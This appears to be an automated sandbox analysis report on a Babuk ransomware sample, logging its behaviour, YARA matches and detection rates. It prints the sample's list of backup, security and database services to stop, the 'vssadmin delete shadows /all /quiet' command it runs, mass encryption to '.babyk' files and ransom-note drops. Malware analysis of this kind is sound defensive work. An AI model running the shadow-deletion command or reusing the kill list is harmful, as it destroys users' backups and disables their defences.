                Source: babuk_v5.exeBinary or memory string: p@Bvsssqlsvc$memtasmepocssophosveeambackupGxVssGxBlrGxFWDGxCVDGxCIMgrDefWatchccEvtMgrccSetMgrSavRoamRTVscanQBFCServiceQBIDPServiceIntuit.QuickBooks.FCSQBCFMonitorServiceYooBackupYooITzhudongfangyusophosstc_raw_agentVSNAPVSSVeeamTransportSvcVeeamDeploymentServiceVeeamNFSSvcveeamPDVFSServiceBackupExecVSSProviderBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDiveciMediaServiceBackupExecJobuserBackupExecManagementServiceBackupExecRPCServiceAcrSch2SvcAcronisAgentCASAD2DWebSvcCAARCUpdateSvcsql.exeoracle.exeocssd.exedbsnmp.exesynctime.exeagntsvc.exeisqlplussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefox.exetbirdconfig.exemydesktopqos.exeocomm.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exesteam.exethebat.exethunderbird.exevisio.exewinword.exewordpad.exenotepad.exeQ:\W:\E:\R:\T:\Y:\U:\I:\O:\P:\A:\S:\D:\F:\G:\H:\J:\K:\L:\Z:\X:\C:\V:\B:\N:\M:\IsWow64Processkernel32.dllkernel32.dllWow64DisableWow64FsRedirection/c vssadmin.exe delete shadows /all /quietcmd.exeopenkernel32.dllWow64RevertWow64FsRedirectionadvapi32.dllSystemFunction036%lu, Error Code: ->
                May disable shadow drive data (uses vssadmin)Show sources
                Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quietJump to behavior
                Modifies existing user documents (likely ransomware behavior)Show sources
                Source: C:\Users\user\Desktop\babuk_v5.exeFile moved: C:\Users\user\Desktop\NIKHQAIQAU\FENIVHOIKN.xlsxJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile moved: C:\Users\user\Desktop\NIKHQAIQAU\ZQIXMVQGAH.mp3Jump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile moved: C:\Users\user\Desktop\JSDNGYCOWY\JSDNGYCOWY.docxJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile moved: C:\Users\user\Desktop\JSDNGYCOWY\NIKHQAIQAU.xlsxJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile moved: C:\Users\user\Desktop\FENIVHOIKN.xlsxJump to behavior
                Writes many files with high entropyShow sources
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT.LOG1.babyk entropy: 7.99653066477Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TM.blf.babyk entropy: 7.99708321212Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000001.regtrans-ms.babyk entropy: 7.99962827284Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\Default\NTUSER.DAT{8ebe95f7-3dcb-11e8-a9d9-7cfe90913f50}.TMContainer00000000000000000002.regtrans-ms.babyk entropy: 7.99967384143Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.babyk entropy: 7.99229271013Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin.babyk entropy: 7.9946841253Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst.babyk entropy: 7.9973645994Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.babyk entropy: 7.99925167333Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.babyk entropy: 7.99981535924Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.babyk entropy: 7.99982426926Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.babyk entropy: 7.99984083734Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-23_174109_5608-5612.log.babyk entropy: 7.99457080703Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_195423_6516-6324.log.babyk entropy: 7.99500252504Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_125251_1844-1848.log.babyk entropy: 7.99785895861Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Downloader_2020-07-27_144632_3336-1696.log.babyk entropy: 7.99322322331Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_195437_6860-6784.log.babyk entropy: 7.9987295452Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_074908_1728-1718.log.babyk entropy: 7.99806658207Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_074908_16c0-4d4.log.babyk entropy: 7.99857374141Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-08-26_080227_145c-17a4.log.babyk entropy: 7.99807765518Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_082319_c94-ff4.log.babyk entropy: 7.99787603583Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-08-26_080227_17fc-17f8.log.babyk entropy: 7.9980869788Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2019-06-27_125252_1864-1868.log.babyk entropy: 7.99970326298Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_082319_1314-414.log.babyk entropy: 7.99772050097Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_074907_15c-410.log.babyk entropy: 7.99797371449Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-08-26_080226_b58-b68.log.babyk entropy: 7.99813612471Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_195441_60-6252.log.babyk entropy: 7.99083082248Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_082318_17d4-1694.log.babyk entropy: 7.9980879862Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\userTelemetryCache.otc.session.babyk entropy: 7.99116075548Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.babyk entropy: 7.99714687529Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.babyk entropy: 7.99847305961Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.babyk entropy: 7.9986665378Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.babyk entropy: 7.99729873128Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.babyk entropy: 7.99724969049Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.babyk entropy: 7.99714719164Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.babyk entropy: 7.99270359539Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb.babyk entropy: 7.9998109263Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log.babyk entropy: 7.99961095278Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00001.jrs.babyk entropy: 7.99962903467Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbres00002.jrs.babyk entropy: 7.99962960114Jump to dropped file
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edbtmp.log.babyk entropy: 7.99967363847Jump to dropped file

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: babuk_v5.exe, type: SAMPLEMatched rule: Detects destructive malware Author: Florian Roth
                Source: 1.0.babuk_v5.exe.bf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects destructive malware Author: Florian Roth
                Source: babuk_v5.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: babuk_v5.exe, type: SAMPLEMatched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.0.babuk_v5.exe.bf0000.0.unpack, type: UNPACKEDPEMatched rule: Destructive_Ransomware_Gen1 date = 2018-02-12, hash1 = ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85, author = Florian Roth, description = Detects destructive malware, reference = http://blog.talosintelligence.com/2018/02/olympic-destroyer.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: classification engineClassification label: mal96.rans.evad.winEXE@8/1115@1/0
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windows.cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].cssJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeMutant created: \Sessions\1\BaseNamedObjects\DoYouWantToHaveSexWithCoungDong
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_01
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\How To Restore Your Files.txtJump to behavior
                Source: babuk_v5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\babuk_v5.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: babuk_v5.exeVirustotal: Detection: 77%
                Source: babuk_v5.exeMetadefender: Detection: 51%
                Source: babuk_v5.exeReversingLabs: Detection: 89%
                Source: unknownProcess created: C:\Users\user\Desktop\babuk_v5.exe 'C:\Users\user\Desktop\babuk_v5.exe'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: unknownProcess created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt
                Source: C:\Users\user\Desktop\babuk_v5.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quietJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quietJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\msftedit.dllJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: babuk_v5.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: babuk_v5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: a);I(f,a);I);r.length>0&&t.queryToFetch&&(u=n.escapeRegex(t.queryToFetch),f=u.split(" ").map(function(n){return new RegExp("^"+n+"| "+n,"i")}),r=r.filter(function(n){return f.every(function(t){return t.test(n)})}));e=lt(r);i(e)})},getResults:function(n){return n},dataSource:"FEH",getSuggestionType:function(){return"FEH"},customCreateLocalResponseSuggestion:function(n,t){return l(n,t,{type:2,content:"&#xE81C"})},supportsEmptyQuery:!0},{getResultsContainer:function(){return a()},getResults:function(n,t){return n.then(function(n){return t?n.slice(0,t):n})},dataSource:"TOPP",getSuggestionType:function(){return"TOPL"},customGetMax:function(){return 5},customCreateLocalResponseSuggestion:function(i,r,u){return t(i,r,u,n.ScopeConfig[n.Scope.Apps].icon,i.isImmersive?i.logoBackgroundColor:undefined)},supportsEmptyQuery:!0},{getResultsContainer:function(n){return ThresholdUtilities.createPromise(function(t){var i=r?r.retrieveItemsFromCache(n.queryToFetch):[];t(i)})},getResults:function(n){return n},dataSource:"LDIC",getSuggestionType:function(n){return i(n.kind,n.extension,"FD")},maxUpTo3chars:4,maxAfter3chars:7,maxAfter8charsOrInL2ZeroInput:15,supportsEmptyQuery:!1},],g=[{getResultsContainer:function(n){return SearchAppWrapper.CortanaApp.queryFormulationView.startCommandLineQuery(n.originalQuery,"")},dataSource:"CG",getSuggestionType:function(){return"CG"},customCancellation:function(){return SearchAppWrapper.CortanaApp.queryFormulationView.cancelLastCommandLineQuery()},supportsEmptyQuery:!1},];n.LocalDataProviderDataSources=b.concat(k).concat(d).concat(g).map(function(n){return n.dataSource});var u={suggestions:[],maxedOut:!1},nt={},r,tt={"shell:RecycleBinFolder":{icon:{content:"&#xEF87",type:2},locStringKey:"RecycleBin"}};var at=["\\system32\\user.exe","\\system32\\sidebar.exe","\\system32\\at.exe","\\system32\\change.exe","\\system32\\control.exe","\\system32\\find.exe","\\system32\\net.exe","\\system32\\share.exe","\\system32\\rundll32.exe","\\system32\\append.exe","\\system32\\choice.exe","\\system32\\clip.exe","\\system32\\comp.exe","\\system32\\compact.exe","\\system32\\consent.exe","\\system32\\convert.exe","\\system32\\format.exe","\\system32\\graphics.com","\\system32\\label.exe","\\system32\\mem.exe","\\system32\\mode.com","\\system32\\more.com","\\system32\\recover.exe","\\system32\\replace.exe","\\system32\\reset.exe","\\system32\\shadow.exe","\\system32\\sort.exe","\\system32\\tree.com","\\system32\\webcam.exe","\\system32\\systemsettings.exe","\\system32\\command.com","\\system32\\tabtip.exe","\\system32\\services.exe","\\system32\\help.exe","\\system32\\where.exe","\\system32\\skydrive.exe","\\system32\\calc.exe","\\system32\\fc.exe","\\accessories\\wordpad.exe",n.config.blocklistNotepadCommand?"\\system32\\notepad.exe":null,].filter(function(n){return!!n}),it=["\\system32\\finger.exe","\\system32\\ping.exe","\\system32\\print.exe","\\system32\\shutdown.exe","\\system32\\expand.exe","\\system32\\tskill.exe","\\system32\\reg.exe","\\system3
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeCode function: 17_2_000001B143244C20 pushad ; ret 17_2_000001B143244CC2
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeCode function: 17_2_000001B143244901 pushad ; ret 17_2_000001B143244902
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessibility\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Accessories\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Maintenance\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\System Tools\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile created: C:\Documents and Settings\Default\Start Menu\Programs\Windows PowerShell\How To Restore Your Files.txtJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B140380000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B1404D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B1405D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B140A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B142000000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B142620000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1B142720000 memory commit | memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\05_Pictures_taken_in_the_last_month.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\01_Music_auto_rated_at_5_stars.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\02_Music_added_in_the_last_month.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log.babykJump to behavior
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: SearchUI.exe, 00000011.00000002.702009828.000001B140813000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: SearchUI.exe, 00000011.00000003.474927582.000001B142243000.00000004.00000001.sdmpBinary or memory string: a);I(f,a);I);r.length>0&&t.queryToFetch&&(u=n.escapeRegex(t.queryToFetch),f=u.split(" ").map(function(n){return new RegExp("^"+n+"| "+n,"i")}),r=r.filter(function(n){return f.every(function(t){return t.test(n)})}));e=lt(r);i(e)})},getResults:function(n){return n},dataSource:"FEH",getSuggestionType:function(){return"FEH"},customCreateLocalResponseSuggestion:function(n,t){return l(n,t,{type:2,content:"&#xE81C"})},supportsEmptyQuery:!0},{getResultsContainer:function(){return a()},getResults:function(n,t){return n.then(function(n){return t?n.slice(0,t):n})},dataSource:"TOPP",getSuggestionType:function(){return"TOPL"},customGetMax:function(){return 5},customCreateLocalResponseSuggestion:function(i,r,u){return t(i,r,u,n.ScopeConfig[n.Scope.Apps].icon,i.isImmersive?i.logoBackgroundColor:undefined)},supportsEmptyQuery:!0},{getResultsContainer:function(n){return ThresholdUtilities.createPromise(function(t){var i=r?r.retrieveItemsFromCache(n.queryToFetch):[];t(i)})},getResults:function(n){return n},dataSource:"LDIC",getSuggestionType:function(n){return i(n.kind,n.extension,"FD")},maxUpTo3chars:4,maxAfter3chars:7,maxAfter8charsOrInL2ZeroInput:15,supportsEmptyQuery:!1},],g=[{getResultsContainer:function(n){return SearchAppWrapper.CortanaApp.queryFormulationView.startCommandLineQuery(n.originalQuery,"")},dataSource:"CG",getSuggestionType:function(){return"CG"},customCancellation:function(){return SearchAppWrapper.CortanaApp.queryFormulationView.cancelLastCommandLineQuery()},supportsEmptyQuery:!1},];n.LocalDataProviderDataSources=b.concat(k).concat(d).concat(g).map(function(n){return n.dataSource});var u={suggestions:[],maxedOut:!1},nt={},r,tt={"shell:RecycleBinFolder":{icon:{content:"&#xEF87",type:2},locStringKey:"RecycleBin"}};var at=["\\system32\\user.exe","\\system32\\sidebar.exe","\\system32\\at.exe","\\system32\\change.exe","\\system32\\control.exe","\\system32\\find.exe","\\system32\\net.exe","\\system32\\share.exe","\\system32\\rundll32.exe","\\system32\\append.exe","\\system32\\choice.exe","\\system32\\clip.exe","\\system32\\comp.exe","\\system32\\compact.exe","\\system32\\consent.exe","\\system32\\convert.exe","\\system32\\format.exe","\\system32\\graphics.com","\\system32\\label.exe","\\system32\\mem.exe","\\system32\\mode.com","\\system32\\more.com","\\system32\\recover.exe","\\system32\\replace.exe","\\system32\\reset.exe","\\system32\\shadow.exe","\\system32\\sort.exe","\\system32\\tree.com","\\system32\\webcam.exe","\\system32\\systemsettings.exe","\\system32\\command.com","\\system32\\tabtip.exe","\\system32\\services.exe","\\system32\\help.exe","\\system32\\where.exe","\\system32\\skydrive.exe","\\system32\\calc.exe","\\system32\\fc.exe","\\accessories\\wordpad.exe",n.config.blocklistNotepadCommand?"\\system32\\notepad.exe":null,].filter(function(n){return!!n}),it=["\\system32\\finger.exe","\\system32\\ping.exe","\\system32\\print.exe","\\system32\\shutdown.exe","\\system32\\expand.exe","\\system32\\tskill.exe","\\system32\\reg.exe","\\system3
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
